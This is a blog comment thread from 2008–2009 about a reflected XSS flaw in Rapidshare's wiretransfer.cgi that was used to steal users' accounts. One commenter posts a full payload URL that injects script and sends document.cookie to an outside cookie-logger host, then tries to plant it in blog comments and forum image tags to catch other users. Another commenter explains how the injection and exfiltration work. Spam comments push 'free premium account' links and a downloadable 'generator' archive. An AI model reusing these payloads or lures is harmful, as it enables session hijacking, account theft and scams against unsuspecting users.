Comments on: I Own Your Rapidshare Accounts

By: kristine

kristine — Thu, 07 May 2009 06:57:54 +0000

http://rapidshare.com/files/230103712/generator_RS_Premium.rar

best way is the generator

By: Samsul

Samsul — Wed, 18 Feb 2009 00:48:33 +0000

Right @N00b, I wonder if there’s any way to do this :-)

By: Hacking Yahoo/Gmail/Hotmail Accounts (A-Z Guide)

Hacking Yahoo/Gmail/Hotmail Accounts (A-Z Guide) — Tue, 20 Jan 2009 22:48:13 +0000

[…] users (and I repet myself) TEND TO USE THE SAME PASSWORD over and over again. Take a look at this article which is an example of such an attack. I’m sure the majority of rapidshare users use […]

By: smart

smart — Thu, 15 Jan 2009 03:00:26 +0000

free rapidshare premium account!!!
http://www.AWSurveys.com/HomeMain.cfm?RefID=smartnike

By: Dronen

Dronen — Wed, 06 Aug 2008 22:37:30 +0000

Fixed on 06-Aug-2008

By: N00b

N00b — Wed, 06 Aug 2008 19:29:06 +0000

I hear that rapidshare have fixed this exploit now :(

Wondered why i couldnt get it to work!!

Is there any other way to do this?

By: Steph

Steph — Wed, 30 Jul 2008 17:47:15 +0000

It’s okay, I figured it out by trying it myself. The requests are logged in the Raw Access log on my server :3

But I’m not sure how I can embed this code on a webpage. I tried to post it on my blog to test it. I posted it in the "website" field in a comment, like this :

http://rapidshare.com/cgi-bin/wiretransfer.cgi?extendaccount=12345%22%3E%3Cscript%3E((function()%20{new%20Image().src%20=%20"http://www.wasabite.com/cookielogger/rapidshare/?c="%20%2B%20escape(document.cookie);}))()%3C/script%3E

The link appears correctly in the status bar but when I click on it, but it shows up like this in the URL bar :
" rel="nofollow">http://rapidshare.com/cgi-bin/wiretransfer.cgi?extendaccount=12345"> <== See the ?c= %2B escape part… there is no "+"

I also tried on a forum using bbCode.
[img size=150]http://rapidshare.com/cgi-bin/wiretransfer.cgi?extendaccount=12345%22%3E%3Cscript%3E((function()%20{new%20Image().src%20=%20"http://www.wasabite.com/cookielogger/rapidshare/?c="%20%2B%20escape(document.cookie);}))()%3C/script%3E[/img]

I have absolutely no clue if it will work. I’ve never worked with JavaScript before, so I don’t know anything about it. The only thing I know is C++ that is very similar to JS.

By: Steph

Steph — Wed, 30 Jul 2008 10:34:32 +0000

Cool thanks!
But now… how do you access the info logged on your server? Is it just in a log that logs all the requests to your server, so when someone requests the image object source, the request for the source is recorded in your log?
It’s the only bit I’m not sure to understand, where the info is recorded.
Thanks! :3

By: Giorgio

Giorgio — Wed, 30 Jul 2008 06:34:23 +0000

@Steph: All correct. [injection] is working because the Rapidshare CGI script echoes it back like it is, so the thing is rendered as a client side script. I log the cookie to my server by creating an Image object and using the URL for my logger as its src property: that URL is immediately loaded in background. @newbie: No purpose for the parentheses around the function, other than readability: it means create this function but evaluate it in a string context, just like calling its toString() method. var [login, pwd] = is a destructuring assignment.

By: newbie

newbie — Wed, 30 Jul 2008 04:41:55 +0000

Hi Giorgio. What is the purpose for those parenthesis around the function in your injection variable? Also, what is this thing with the braces called: var [login, pwd] ? Thanks